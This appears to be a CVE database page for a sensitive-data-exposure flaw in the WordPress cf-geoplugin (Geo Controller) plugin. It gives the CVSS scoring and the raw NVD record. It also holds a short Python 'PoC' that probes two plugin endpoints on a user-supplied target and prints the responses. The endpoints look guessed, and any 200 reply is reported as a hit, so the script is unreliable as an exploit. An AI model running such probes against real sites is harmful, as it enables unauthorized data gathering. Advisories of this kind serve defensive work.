Security Vulnerability Report
中文
CVE-2025-62109 CVSS 5.3 MEDIUM

CVE-2025-62109

Published: 2025-12-09 16:18:01
Last Modified: 2026-04-27 17:16:32

Description

Insertion of Sensitive Information Into Sent Data vulnerability in INFINITUM FORM Geo Controller cf-geoplugin allows Retrieve Embedded Sensitive Data.This issue affects Geo Controller: from n/a through <= 8.9.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

cf-geoplugin插件 <= 8.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62109 PoC - cf-geoplugin Sensitive Data Exposure # Target: WordPress site with cf-geoplugin plugin <= 8.9.4 target_url = input("Enter target URL: ") # Construct the malicious request to exploit the vulnerability # The plugin's geo controller endpoint is vulnerable endpoints = [ "/wp-admin/admin-ajax.php?action=cf_geoplugin_get_data", "/wp-content/plugins/cf-geoplugin/includes/geo-controller.php", ] print("[*] Testing CVE-2025-62109 vulnerability...") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[+] Endpoint {endpoint} responded") print(f"[+] Response preview: {response.text[:500]}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62109", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:01.320", "lastModified": "2026-04-27T17:16:32.247", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in INFINITUM FORM Geo Controller cf-geoplugin allows Retrieve Embedded Sensitive Data.This issue affects Geo Controller: from n/a through <= 8.9.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/cf-geoplugin/vulnerability/wordpress-geo-controller-plugin-8-9-4-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}